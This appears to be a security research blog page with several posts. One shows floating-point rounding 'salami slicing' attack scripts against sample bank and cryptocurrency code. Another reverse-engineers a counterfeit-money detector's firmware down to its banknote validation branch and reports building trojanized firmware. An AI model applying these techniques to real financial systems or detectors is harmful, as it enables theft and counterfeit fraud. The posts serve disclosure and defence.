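The KDF-plus-authenticated-encryption pattern mentioned above looks roughly like the following. It is shown as a Node.js sketch for brevity; a real Android client would use the platform's own crypto APIs and Keystore:

// kdf-aead-sketch.js - derive an encryption key from the app password and
// protect project data with an authenticated cipher (AES-256-GCM).
const crypto = require('crypto');

function encryptProject(password, plaintext) {
  const salt = crypto.randomBytes(16);
  const key = crypto.scryptSync(password, salt, 32);        // KDF: scrypt
  const iv = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  const tag = cipher.getAuthTag();                           // integrity: GCM authentication tag
  return { salt, iv, tag, ciphertext };
}

function decryptProject(password, blob) {
  const key = crypto.scryptSync(password, blob.salt, 32);
  const decipher = crypto.createDecipheriv('aes-256-gcm', key, blob.iv);
  decipher.setAuthTag(blob.tag);                             // throws if the data was tampered with
  return Buffer.concat([decipher.update(blob.ciphertext), decipher.final()]).toString('utf8');
}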

Conclusions
Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015 we found a total of 50 issues in the 20 applications we analyzed; in 2017 we found a staggering 147 issues in the 34 applications we selected. This is an increase from an average of 2.5 to roughly 4.3 vulnerabilities per application.

We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/ indirectly influence the industrial process.

In 2015, we wrote:

SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.

We now concede that we were too optimistic and acknowledge that our previous statement was wrong.

Over the past few years, the number of incidents in SCADA systems has increased and the systems become more interesting for attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks.

Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications, before it is too late.

For the complete analysis, please download our white paper here.

Acknowledgments

Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
 
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
 
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
 
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
 
Embedi
Embedi expertise is backed up by extensive experience in security of embedded devices, with special emphasis on attack and exploit prevention. Years of research are the genesis of the software solutions created. Embedi developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry such as: wearables, smart home, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
RESEARCH | December 17, 2015

(In)secure iOS Mobile Banking Apps – 2015 Edition

Two years ago, I decided to conduct research in order to obtain a global view of the state of security of mobile banking apps from some important banks. In this blog post, I will present my latest results to show how the security of the same mobile banking apps has evolved.


INSIGHTS | August 25, 2015

Money may grow on trees

Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.

 

Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
 
Lack of precision in numbers

The IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.

 

The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).

 

We will explore what happens when inexact floating point exceptions are triggered. The rounded result of a valid operation can be different from the real (and sometimes infinitely precise) result and certain operations may go unnoticed.
 
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:

 

To exemplify this matter, this is how the number 0.1 looks internally in Python:

 

The decimal value 0.1 cannot be represented precisely in binary notation, since it is an infinitely repeating fraction in base 2. Python rounds the number back to 0.1 before displaying the value.
 
Salami slicing the decimals

Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.

 

Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:
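
The same result can be reproduced in any V8-based shell, such as d8 or Node.js:

0.1 + 0.2;          // 0.30000000000000004
0.1 + 0.2 === 0.3;  // false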

 

Perhaps we could take some of those decimals without JavaScript noticing:
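
For example, subtracting a small enough amount from a large balance rounds back to the original value, so the operation leaves no trace:

var balance = 1000000;
balance - 0.00000000001 === balance;   // true: the subtraction is silently lost
balance - 0.0000001 === balance;       // false: this amount is large enough to be noticed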

 

 

 

But what happens if we are greedy? How much can we take without JavaScript noticing?

 
 
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0)
    return 1; // Error! The account can not have a negative balance
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print("--------------------------------------------");
  print(" The balance of the bank accounts is:");
  print(" Account 0: "+account[0]+" u$s");
  print(" Account 1: "+account[1]+" u$s (profit)");
  print(" Overall money: "+(account[0]+account[1]))
  print("--------------------------------------------");
  if(typeof time !== 'undefined') {
     print(" Estimated daily profit: "+( (60*60*24/time) * account[1] ) );
     print("--------------------------------------------");
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // I will save my profit here 
}
 
account = new Array();
initial_deposit = 1000000;
profit = 0
print("\n1) Searching for the best profit");
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
  reset_values();
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if(account[0]==initial_deposit && i>profit) {
    profit = i;
 //   print("I can grab "+profit.toPrecision(21));
  } else {
    break;
  }
}
print("   Found: "+profit.toPrecision(21));
print("\n2) Let's start moving some money:");
 
reset_values();
 
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 

The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are taking: the higher the value, the higher the amount of decimals. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits into a secondary Account 1:

 

Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.

 

Another way to abuse the loss of precision is when dealing with large numbers. The problem becomes visible when using at least 17 digits.
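
A couple of quick checks in JavaScript show where integer precision runs out: every integer up to 2^53 - 1 is exact, but beyond that whole units start to disappear:

Number.MAX_SAFE_INTEGER;                       // 9007199254740991 (2^53 - 1)
10000000000000000 + 1 === 10000000000000000;   // true: adding one whole unit changes nothing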
 

Now, the sample attack application will target a cryptocurrency, fakecoin.js:

 

 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0) {
    return 1; // Error! The account can not have a negative balance
  }
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print("-------------------------------------------------");
  print(" The general balance is:");
  print(" Crypto coin:  "+crypto_coin);
  print(" Crypto value: "+crypto_value);
  print(" Crypto cash:  "+(account[0]*crypto_value)+" u$s");
  print(" Account 0: "+account[0]+" coins");
  print(" Account 1: "+account[1]+" coins");
  print(" Overall value: "+( ( account[0] + account[1] ) * crypto_value )+" u$s")
  print("-------------------------------------------------");
  if(typeof time !== 'undefined') {
     seconds_in_a_day = 60*60*24;
     print(" Estimated daily profit: "+( (seconds_in_a_day/time) * account[1] * crypto_value) +" u$s");
     print("-------------------------------------------------\n");
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // profit
}
 
// My initial money
initial_deposit = 10000000000000000;
crypto_coin = "Fakecoin"
crypto_value = 0.00000000011;
 
// Here I have my bank accounts defined
account = new Array();
 
print("\n1) Searching for the best profit");
profit = 0
for (j = 1; j < initial_deposit; j+=1) {
  reset_values();
  wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
  if(account[0]==initial_deposit && j > profit) {
    profit = j;
  } else {
    break;
  }
}
print("   Found: "+profit);
reset_values();
start = new Date().getTime() / 1000;
print("\n2) Let's start moving some money");
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 
 
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at a time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin in Account 0, allowing us to profit approximately $2,300 USD per day:

Depending on the implementation, a hacker can use either floating point numbers or large numbers to generate money out of thin air.
 
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices (a short sketch follows the list):
  • If you rely on values that use decimal numbers, use specialized arbitrary-precision types such as BigDecimal in Java.
  • Do not allow values larger than 16 digits to be stored in variables, and truncate decimals, or
  • Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).
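
As a brief illustration of the first point in JavaScript (a sketch only; it relies on BigInt, so it needs a modern engine), balances can be kept as integer amounts of the smallest unit, such as cents, instead of floating point dollars:

// Store money as integer cents using BigInt: exact arithmetic, no hidden rounding.
let account0 = 100000000n;   // $1,000,000.00 expressed in cents
let account1 = 0n;

function wire(amountCents) {
  if (amountCents <= 0n || amountCents > account0) return false;  // reject invalid transfers
  account0 -= amountCents;
  account1 += amountCents;
  return true;
}

wire(1n);                            // moving a single cent is never silently lost
console.log(account0 + account1);    // 100000000n - the total is always conserved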

 

INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up, and some highly visible IPOs and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment; particularly so when it comes to the hottest of hot investment areas – information security companies.

Over the years I've found myself working with a number of private equity investment firms – helping them to review the technical merits and implications of products being brought to the market by new security startups. In most cases it's not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious to the investors I know. If you're going to be handing over money in the five to twenty million dollar range, you're going to want to do your homework on both the company and the product opportunity.

Over the last few years I've noted that a sizable number of private equity investment firms have built into their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune 500 technology companies. It would seem that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be a valuable investment in a somewhat larger investment strategy.

When it comes to performing the technical due diligence on a startup (whether it’s a security or social media company for example), the process tends to require a mix of technical review and tapping past experiences if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason, new companies go out of their way to invent their own vocabulary as descriptors of their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a "next-generation big-data derived heuristic determination engine" can more than adequately be summed up as "signature-based detection". Apparently using the word "signature" in your technology description is frowned upon, and the product management folks avoid using the word (however applicable it may be). Distilling the word soup is a key component of being able to compare apples with apples.

 

    2. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year's technology is almost certainly a progression of the last decade's worth of invention. This isn't necessarily bad, but it is important to determine the DNA and hereditary path of the "new" technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up's approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I've found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines – while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.

 

    3. Code Language Review – It's important to look at the languages that have been employed by the company in the development of their product. Popular rapid prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirer companies that'll want to integrate the technology with their own existing product portfolio (i.e. they're not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration into scalable public cloud platforms. Knowing which development technology has been used where and for what purpose can rapidly qualify or disqualify the strength of the company's product management and engineering teams – and help orientate an investor on future acquisition or IPO paths.

 

    4. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight into a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.

 

    5. Does it do what it says on the tin? – I hate to say it, but there's a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nut-shell, this phase focuses on the claims being made by the marketing literature and product management teams, and tests both the viability and technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the company's user acceptance team (UAT) (i.e. the stuff they guarantee they can do), through to common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.

 

    6. Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always highly recommended. These tests tend to unveil important information about the lifecycle maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important for consumer-focused products and services, because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set the start-up back a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced into the customer’s environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and discerning the actual intellectual property powering the start-up’s technology – but many do not. Regardless, in working with these investment firms and performing the technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing in the start-up but was able to use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | October 28, 2013

Hacking a counterfeit money detector for fun and non-profit

In Spain we have a saying, “Hecha la ley, hecha la trampa,” which basically means there will always be a way to circumvent a restriction. In fact, that is pretty much what hacking is all about.

 

It seems the idea of counterfeiting appeared at the same time as legitimate money. The Wikipedia page on counterfeit money (http://en.wikipedia.org/wiki/Counterfeit_money) is a fascinating read that helps explain its effects.

 

Nowadays every physical currency implements security measures to prevent counterfeiting. Some counterfeits can be detected with the naked eye, while others need specific devices or procedures to be identified. To help employees, counterfeit money detectors can be found in places that accept cash, including shops, malls, post offices, banks, and gas stations.

 

Recently I took a look at one of these devices, Secureuro. I chose this device because it is widely used in Spain, and its firmware is freely available to download.
http://www.securytec.es/Informacion/clientes-de-secureuro

 

As usual, the first thing I did when approaching a static analysis of a device of this kind was to collect as much information as possible. We should look for anything that could help us to understand how the target works at all levels.

 

In this case I used the following sources:
YouTube
http://www.youtube.com/user/EuroSecurytec
I found some videos where the vendor details how to use the device. This let me analyze the device’s behavior: when an LED turns on, when a sound plays, and what messages are displayed. This knowledge is very helpful for understanding the underlying logic when analyzing the assembly later on.
 
 
Vendor Material
Technical specs, manuals, software, firmware … [1] [2] [3] See references.
The following document provides some insights into the device’s security http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf (resource no longer available)
Unfortunately, some of these claims are not completely true and others are simply false. It is possible to understand how Secureuro works; we can access the firmware and EEPROM without even needing hardware hacking. Also, there is no encryption system protecting the firmware.
Before we start discussing the technical details, I would like to clarify that we are not disclosing any trick that could help criminals bypass the device ‘as is’. My intention is not to forge a banknote that could pass as legitimate; that is a criminal offense. My sole purpose is to explain how I identified the code behind the validation in order to create ‘trojanized’ firmware that accepts even a simple piece of paper as valid currency. We are not exploiting a vulnerability in the device, just a design feature.
 
 
Analyzing the Firmware
The vendor provides software that downloads the firmware into the device. The firmware file I downloaded from the vendor’s website contains 128 KB of data that will be flashed to the ATmega128 microcontroller, so I can load it directly into IDA, although I do not have access to the EEPROM yet.
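Before opening the image in IDA, a cheap first pass that often pays off is scanning the raw file for runs of printable ASCII, much like the Unix ‘strings’ utility; menu text and error messages become useful landmarks once the disassembly is open. A minimal Python sketch of the idea (the file name is just a placeholder for wherever you saved the downloaded image):

# Quick 'strings'-style pass over the raw 128 KB flash image.
# "secureuro_fw.bin" is a placeholder for the downloaded firmware file.
import re

with open("secureuro_fw.bin", "rb") as f:
    image = f.read()

# Print every run of six or more printable ASCII characters with its offset.
for match in re.finditer(rb"[\x20-\x7e]{6,}", image):
    print(f"0x{match.start():05X}  {match.group().decode('ascii')}")

The string table discussed further below is exactly the kind of thing a pass like this surfaces.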
 
Entry Points
A basic approach to dealing with this kind of firmware is to identify some elements or entry points that can be leveraged to look for interesting pieces of code.
A minimal set includes:
 
Interrupt Vectors
  1.  RESET == Main Entry Point
  2.  TIMERs
  3.  UARTs
  4.  SPI
Mnemonics
  1.  LPM (Load Program Memory)
  2.  SPM (Store Program Memory)
  3.  IN
  4.  OUT
Registers
 
ADCL: The ADC Data Register Low
ADCH: The ADC Data Register High
ADCSRA: ADC Control and Status Register
ADMUX: ADC Multiplexer Selection Register
ACSR: Analog Comparator Control and Status
UBRR0L: USART Baud Rate Register
UCSR0B: USART Control and Status Register
UCSR0A: USART Control and Status Register
UDR0: USART I/O Data Register
SPCR: SPI Control Register
SPSR: SPI Status Register
SPDR: SPI Data Register
EECR: EEPROM Control Register
EEDR: EEPROM Data Register
EEARL: EEPROM Address Register Low
EEARH: EEPROM Address Register High
OCR2: Output Compare Register
TCNT2: Timer/Counter Register
TCCR2: Timer/Counter Control Register
OCR1BL: Output Compare Register B Low
OCR1BH: Output Compare Register B High
OCR1AL: Output Compare Register A Low
OCR1AH: Output Compare Register A High
TCNT1L: Counter Register Low Byte
TCNT1H: Counter Register High Byte
TCCR1B: Timer/Counter1 Control Register B
TCCR1A: Timer/Counter1 Control Register A
OCR0: Timer/Counter0 Output Compare Register
TCNT0: Timer/Counter0
TCCR0: Timer/Counter Control Register
TIFR: Timer/Counter Interrupt Flag Register
TIMSK: Timer/Counter Interrupt Mask Register
Using this information, we should reconstruct some firmware functions to make the image more reverse-engineering friendly.
First, I try to identify ‘Main’ by following the flow from the RESET ISR. This step is pretty straightforward.
As an example of collecting information based on the mnemonics, we identify a function reading from flash memory, which is renamed to ‘readFromFlash‘. Its cross-references will provide valuable information.
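That kind of hunting is easy to automate. The following IDAPython-flavored sketch assumes a reasonably recent IDA API (print_insn_mnem, print_operand, get_func_name); older releases expose the same information under different names, and the register matching only works if the I/O ports have been labeled in the database:

# IDAPython sketch: flag flash- and EEPROM-related instructions and note
# which function contains them. Assumes a recent (7.x+) IDAPython API.
import idautils
import idc

FLASH_MNEMONICS = {"lpm", "spm"}                   # program-memory access
EEPROM_REGS = ("EECR", "EEDR", "EEARL", "EEARH")   # EEPROM I/O registers

for ea in idautils.Heads():
    mnem = (idc.print_insn_mnem(ea) or "").lower()
    operands = " ".join((idc.print_operand(ea, i) or "") for i in range(2))
    if mnem in FLASH_MNEMONICS or any(reg in operands for reg in EEPROM_REGS):
        func = idc.get_func_name(ea) or "<no function>"
        print(f"{ea:#06x}  {func:<16} {mnem} {operands}")

Clusters of LPM hits point at table readers like ‘readFromFlash‘, and operands touching the EEPROM registers lead straight to the helpers described next.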
By finding the references to the registers involved in EEPROM operations I come across the following functions ‘sub_CFC‘ and ‘sub_CF3‘:

 

The first routine reads from an arbitrary address in the EEPROM. The second routine writes to the EEPROM. I rename ‘sub_CFC‘ to ‘EEPROM_read‘ and ‘sub_CF3‘ to ‘EEPROM_write‘. These two functions are very useful, and provide us with important clues.
Now that our firmware looks a little bit more friendly, we can focus on the implemented functionality. The documentation I collected states that this device has been designed to allow communication with a computer; therefore we should start by taking a look at the UART ISRs.
Tip: You can look for USART configuration registers UCSR0B, UBRR0… to see how it is configured. 
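As a side note, the value written to UBRR0 also tells you the baud rate you will need if you later want to talk to the device yourself. For an AVR USART in asynchronous normal mode the relationship is baud = F_CPU / (16 * (UBRR + 1)); the numbers in the sketch below are illustrative assumptions, not values taken from Secureuro:

# Recover the configured baud rate from the UBRR value seen in the init code.
# Asynchronous normal mode (U2X = 0): baud = F_CPU / (16 * (UBRR + 1)).
# Both constants below are placeholders, not measurements from the device.
F_CPU = 8_000_000   # assumed CPU clock in Hz
UBRR = 51           # assumed value written to UBRR0H:UBRR0L

baud = F_CPU / (16 * (UBRR + 1))
print(f"UBRR={UBRR} at {F_CPU / 1e6:g} MHz -> {baud:.0f} baud")
# For example, UBRR=51 at 8 MHz gives ~9615 baud, i.e. a 9600 baud setup.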
USART0_RX
It is definitely interesting: when receiving a ‘J’ (0x4A) character, it initializes the usual procedure to send data through the serial interface. It checks UDRE until it is ready and then sends out bytes through UDR0. Going down a little bit, I find the following piece of code.
It is using the EEPROM read function I identified earlier. It seems that if we want to understand what is going on, we will have to analyze the other functions involved in this basic block, ‘sub_3CBB‘ and ‘sub_3C9F‘.
 
SUB_3CBB
This function is receiving two parameters, a length (r21:r20) and a memory address (r17:r16), and transmitting the n bytes located at the memory address through UDR0. It basically sends n bytes through the serial interface.
I rename ‘sub_3CBB’ to ‘dumpMemToSerial‘. So this function is being called in the following way: dumpMemToSerial(0xC20, 9). What’s at address 0xC20? Apparently nothing that makes sense to dump out. I must be missing something here. What can we do? Let’s analyze the stub code the linker puts at the RESET ISR, just before the ‘Main’ entry point. That code usually contains routines for custom memory initialization.
Sure enough, ‘sub_4D02‘ is a memory copy function from flash to SRAM. It uses LPM, which demonstrates how important it is to check specific mnemonics to discover juicy functions.
Now take a look at the parameters: at ROM:4041 it is copying 0x2BD bytes (r21:r20) from 0x80A1 (r31:r30) to 0xBC2 (r17:r16). If we go to 0x80A1 in the firmware file, we find a string table!
Knowing that 0xBC2 holds the string table above, my previous call makes much more sense now: dumpMemToSerial(0xC20, 9) => 0xC20 - 0xBC2 = 0x5E
String Table (0x80A1) + 0x5E == “#RESETS”
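That arithmetic is easy to script, so every dumpMemToSerial(address, length) call spotted in the disassembly can be resolved to the text it actually emits. A small sketch using the addresses recovered above (the firmware file name is a placeholder, and the call sites are something you would collect by hand or with an xref script):

# Resolve dumpMemToSerial(sram_address, length) calls back to their strings.
# 0x80A1 = string table offset in flash, 0xBC2 = its SRAM copy destination,
# 0x2BD  = table length; all three values come from the stub at ROM:4041.
FLASH_TABLE = 0x80A1
SRAM_TABLE = 0xBC2
TABLE_LEN = 0x2BD

with open("secureuro_fw.bin", "rb") as f:      # placeholder file name
    table = f.read()[FLASH_TABLE:FLASH_TABLE + TABLE_LEN]

def resolve(sram_address, length):
    """Map the SRAM address passed to dumpMemToSerial into the flash table."""
    offset = sram_address - SRAM_TABLE
    return table[offset:offset + length].decode("ascii", errors="replace")

print(resolve(0xC20, 9))   # the "#RESETS" label from the statistics dump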
The remaining function to analyze is ‘sub_3C9F‘, which basically formats a byte into its ASCII representation before sending it out through the serial interface. I rename it ‘hex2ascii‘.
So, according to the code, if we send ‘J’ to the device, we should be receiving some statistics. This matches what I read in the documentation.
http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
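If you have the device on your bench, the same statistics can be pulled with a few lines of pyserial. The port name and baud rate below are assumptions on my part; they depend on your serial adapter and on the USART configuration recovered earlier:

# Request the statistics dump by sending the 'J' command over the serial line.
# Port and baud rate are assumptions; adjust them to your own setup.
import serial

with serial.Serial("/dev/ttyUSB0", 9600, timeout=2) as port:
    port.write(b"J")
    reply = port.read(256)   # expect "#RESETS: ...", "#BILLETES: ...", etc.
    print(reply.decode("ascii", errors="replace"))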
Now this basic block seems much clearer. It is ‘printing’ some internal statistics.
“#RESETS: 000000”, where 000000 is a three-byte counter
“#BILLETES: 000000” (“BILLETES” means “BANKNOTES” in Spanish)
“#NO VALIDOS: 000000” (“NO VALIDOS” means “INVALID” in Spanish)
Wait, hold on a second: the number of invalid banknotes is being stored in a three-byte counter in the EEPROM, starting at position 0xE. Are you thinking what I’m thinking? We should look for the opposite operation. Where is that counter being incremented? That path would hopefully lead us to the part of the code where a banknote is considered valid or invalid 🙂 Keep calm and ‘EEPROM_write’.
Bingo!
Function ‘sub_1FEB’ (I rename it ‘incrementInvalid’) is incrementing the INVALID counter. Now I look for where it is being called.
‘incrementInvalid‘ is part of a branch; guess what’s in the other part?
On the left side of the branch, a variable I renamed ‘note_Value‘ is being compared against 5 (5€) and 0xA (10€). The right side of the branch leads to ‘incrementInvalid‘. Mission accomplished! We found the piece of code where the final validation is performed.
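Putting those pieces together, here is a rough Python restatement of the accept/reject path as I reconstructed it. The control flow mirrors the branch in the disassembly, but the names, the counter’s byte order, and the exact set of accepted values are my own labels and assumptions, not symbols recovered from the firmware:

# Rough model of the final validation branch (names and byte order assumed).
INVALID_COUNTER = 0x0E   # three-byte counter stored in EEPROM at position 0xE

def on_banknote_measured(note_value, eeprom):
    """note_value is the denomination code produced by the earlier checks."""
    if note_value in (5, 10, 20, 50, 100, 200, 500):
        return f"accepted: {note_value} EUR"
    # Anything the checks could not classify ends up in incrementInvalid().
    count = int.from_bytes(eeprom[INVALID_COUNTER:INVALID_COUNTER + 3], "big")
    eeprom[INVALID_COUNTER:INVALID_COUNTER + 3] = (count + 1).to_bytes(3, "big")
    return "rejected: invalid counter incremented"

eeprom = bytearray(4 * 1024)               # the ATmega128 has 4 KB of EEPROM
print(on_banknote_measured(10, eeprom))    # accepted: 10 EUR
print(on_banknote_measured(0, eeprom))     # rejected: invalid counter incremented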
Without going into details, by digging a little bit further and checking where ‘note_Value‘ is referenced, I easily narrow down the scope of the validation to two complex functions. The first one assigns a value of either 1 or 2 to ‘note_Value‘:
The second function takes this value into account to assign the final value. When ‘note_Value‘ is equal to 1, the possible values for the banknote are 5, 10, and 20; otherwise the values are 50, 100, 200, or 500. Why?
I need to learn about Euro banknotes, so I take a look at the “Trainer’s guide to the Eurobanknotes and coins” from the European Central Bank http://www.ecb.europa.eu/euro/pdf/material/Trainer_A4_EN_SPECIMEN.pdf
Curiously, this classification makes what I see in the code actually make sense. Maybe, only maybe, the first function is detecting the hologram type, and the second function is processing the remaining security features and finally assigning the value. The documentation from the vendor states:
Well, what about those six analogue signals? By checking for the registers involved in ADC operations we are able to identify an interesting function that I rename ‘getAnalogToDigital‘.
This function receives the ADC input pin as a parameter. As expected, it is invoked, inside a timer, to complete the conversion of six different pins. The remaining three digital signals, which carry information about the distances, can also be obtained easily.
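To tie the pipeline together, here is a loose Python model of the validation flow as I understand it: the six analog readings and three distance signals feed a first stage that sets ‘note_Value‘ to 1 or 2 (my guess is that this reflects the hologram type), and a second stage then picks the denomination within that group. The sketch only captures the group constraint; everything in it is my own reconstruction and labeling, not vendor code:

# Loose model of the reconstructed two-stage classification (my labels).
LOW_GROUP = (5, 10, 20)             # reachable only when note_Value == 1
HIGH_GROUP = (50, 100, 200, 500)    # reachable only when note_Value == 2

def assign_denomination(note_value, candidate):
    """Stage 2: the final value must belong to the group chosen in stage 1."""
    group = LOW_GROUP if note_value == 1 else HIGH_GROUP
    return candidate if candidate in group else None   # None -> incrementInvalid

print(assign_denomination(1, 20))   # 20: a valid member of the low group
print(assign_denomination(2, 20))   # None: 20 cannot appear in the high group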
There are a lot of routines we could continue reconstructing: password, menu, configurations, timers, hidden/debug functionalities, but that is outside of the scope of this post. I merely wanted to identify a very specific functionality.
The last step was to buy the physical device. I modified the original firmware to accept our home-made IOActive currency, and… what do you think happened? Did it work? Watch the video to find out 😉
The impact is obvious. An attacker with temporary physical access to the device could install customized firmware and cause the device to accept counterfeit money. Taking into account the types of places where these devices are usually deployed (shops, malls, offices, etc.), this scenario is more than feasible.
Once again we see that when it comes to static analysis, collecting information about the target is as important as reverse engineering its code. Without the knowledge gained by reading all of those documents and watching the videos, reverse engineering would have been way more difficult.
I hope you find this useful in some way. I would be pleased if this post encourages you to research further or helps vendors understand the importance of building security measures into these types of devices.
References:
[1] http://www.inves.es/secureuro?p_p_id=56_INSTANCE_6CsS&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=detalleserie&p_p_col_count=1&_56_INSTANCE_6CsS_groupId=18412&_56_INSTANCE_6CsS_articleId=254592&_56_INSTANCE_6CsS_tabSelected=3&templateId=TPL_Detalle_Producto
[2] http://www.secureuro.com/secureuro/ingles/menuingles.htm#
[3] http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
